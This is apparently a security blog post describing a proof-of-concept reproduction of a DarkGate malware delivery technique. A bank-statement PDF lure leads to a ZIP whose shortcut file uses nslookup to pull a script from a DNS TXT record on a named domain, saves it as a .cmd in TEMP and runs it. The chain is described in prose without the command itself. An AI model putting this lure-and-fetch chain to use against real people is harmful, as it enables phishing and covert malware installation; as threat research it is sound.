in

DarkGate Install Script retrieval via DNS TXT Record

Recently, I came across a tweet from Unit 42 showcasing a interesting new technique utilized by DarkGate in order to retrieve DarkGate install script via DNS TXT Records leading to DarkGate infection on the victim machine in their recent campaign.

I developed a PoC for the new DarkGate Install script retrieval technique via DNS TXT Record and uploaded it in the following repo which consists of –

  • PDF with embed link (Name: Bank-Statement-poc.pdf)
  • ZIP Archive (Name: Bank-Statement-20231523-poc.pdf.zip)
    • consists of the LNK (Shortcut) file which retrieves install script via DNS TXT Records (Name: Bank-Statement-20231523-poc.pdf.lnk)

Disclaimer: The PoC does not contain any malicious code =) – also it is a working PoC so you can just use it easily

Infection Chain: Working

Following in the infection chain similar to the one seen in the ITW DarkGate campaign –

At first we open the PDF (Bank-Statement-poc.pdf) which consists of an embedded link which when clicked downloads the ZIP Archive (Bank-Statement-20231523-poc.pdf.zip)

The ZIP Archive consists of a LNK (Shortcut) file which once executed runs a command which uses nslookup to retrieve the TXT records from my testing domain “pocdomain[.]linkpc[.]net”. Further I customized the LNK command a bit as the one in the ITW sample was unstable. The command then parses & dequotes the retrieved TXT record and saves it in the TEMP Directory as “poc.cmd” and then further executes it.

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

What do you think?

70 Points
Upvote Downvote

Posted by Prapattimynk

Data Bouncing – PowerShell Version

TInjA – the Template INJection Analyzer